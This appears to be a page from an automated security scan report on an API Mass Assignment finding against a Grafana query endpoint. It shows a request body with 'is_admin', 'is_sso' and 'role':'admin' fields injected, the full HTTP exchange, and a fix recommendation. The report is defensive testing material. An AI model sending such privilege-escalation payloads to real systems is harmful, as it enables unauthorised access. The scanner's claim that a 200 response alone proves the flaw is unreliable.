Risk(s): API Mass Assignment exploitation may lead to privilege escalation, data tampering, and bypass of security mechanisms.
Fix: Avoid using functions that automatically bind client input to code variables or internal objects. If applicable, explicitly define
and enforce schemas for the input data payloads.
Variant 1 of 1
The following changes were applied to the original request:
Set body to
'{"queries":[{"datasource":{"type":"prometheus","uid":"abcdefghijk"},"expr":"count(up{job="www_heartbeat"})","instant":true,"interval":"","legendFormat":"TOTAL","refId":"G","exemplar":false,"requestId":"12G","utcOffsetSec":-14400,"datasourceId":1,"intervalMs":15000,"maxDataPoints":391},{"datasource":{"type":"prometheus","uid":"abcdefghijk"},"expr":"sum(probe_success{job="www_heartbeat"})","instant":true,"interval":"","legendFormat":"up","refId":"B","exemplar":false,"requestId":"12B","utcOffsetSec":-14400,"datasourceId":1,"intervalMs":15000,"maxDataPoints":391},{"datasource":{"type":"prometheus","uid":"abcdefghijk"},"expr":"count(up{job="www_heartbeat"})-sum(probe_success{job="www_heartbeat"})","instant":true,"interval":"","legendFormat":"DOWN","refId":"A","exemplar":false,"requestId":"12A","utcOffsetSec":-14400,"datasourceId":1,"intervalMs":15000,"maxDataPoints":391}],"range":{"from":"2023-04-06T15:53:18.673Z","to":"2023-04-06T15:58:18.673Z","raw":{"from":"now-5m","to":"now"}},"from":"1680796398673","to"…'
Reasoning:
The test result seems to indicate a vulnerability because the Test Response is successful (returns 200 OK), indicating that the Application/API access is successful.
Request/Response:
POST /grafana/api/ds/query HTTP/1.1
Host: example.org
Connection: keep-alive
x-plugin-id: prometheus
x-grafana-org-id: 1
x-panel-id: 12
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Win32)
content-type: application/json
accept: application/json, text/plain, */*
x-dashboard-uid: xyz
x-datasource-uid: abcdefghijk
Accept-Language: en-US
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://example.org/grafana/d/xyz/team-home-dashboard?orgId=1
{"queries":[{"datasource":{"type":"prometheus","uid":"abcdefghijk"},"expr":"count(up{job="www_heartbeat"})","instant":true,"interval":"","legendFormat":"TOTAL","refId":"G","exemplar":false,"requestId":"12G","utcOffsetSec":-14400,"datasourceId":1,"intervalMs":15000,"maxDataPoints":391},{"datasource":{"type":"prometheus","uid":"abcdefghijk"},"expr":"sum(probe_success{job="www_heartbeat"})","instant":true,"interval":"","legendFormat":"up","refId":"B","exemplar":false,"requestId":"12B","utcOffsetSec":-14400,"datasourceId":1,"intervalMs":15000,"maxDataPoints":391},{"datasource":{"type":"prometheus","uid":"abcdefghijk"},"expr":"count(up{job="www_heartbeat"})-sum(probe_success{job="www_heartbeat"})","instant":true,"interval":"","legendFormat":"DOWN","refId":"A","exemplar":false,"requestId":"12A","utcOffsetSec":-14400,"datasourceId":1,"intervalMs":15000,"maxDataPoints":391}],"range":{"from":"2023-04-06T15:53:18.673Z","to":"2023-04-06T15:58:18.673Z","raw":{"from":"now-5m","to":"now"}},"from":"1680796398673","to":"1680796698673","is_admin":true,"is_sso":true,"role":"admin"}
HTTP/1.1 200 OK
Date: Thu, 06 Apr 2023 16:07:03 GMT
Server: Apache
Strict-Transport-Security: max-age=63072000
Cache-Control: no-store
Content-Security-Policy: script-src 'self' 'unsafe-eval' 'unsafe-inline' 'strict-dynamic' 'nonce-BJxd2DTka/W5jHH/Ynx9lw';object-src 'none';font-src 'self';style-src 'self' 'unsafe-inline' blob:;img-src * data:;base-uri 'self';connect-src 'self' example.org ws://example.org/grafana/ wss://example.org/grafana/;manifest-src 'self';media-src 'none';form-action 'self';
© Copyright HCL Technologies Limited 2000, 2023. All Rights Reserved. - 8 -
Content-Type: application/json
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-Xss-Protection: 1; mode=block
Content-Length: 1472
Keep-Alive: timeout=15, max=43